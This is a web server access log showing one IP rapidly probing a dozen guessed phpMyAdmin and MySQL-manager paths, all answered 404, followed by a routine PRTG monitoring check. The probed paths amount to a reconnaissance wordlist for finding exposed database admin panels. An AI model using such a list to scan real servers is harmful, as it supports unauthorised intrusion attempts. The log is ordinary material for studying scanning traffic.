86.250.73.119 - - [01/Apr/2022:09:39:25 +0200] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:25 +0200] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:25 +0200] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /1phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
86.250.73.119 - - [01/Apr/2022:09:39:26 +0200] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
212.91.246.72 - - [01/Apr/2022:09:39:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
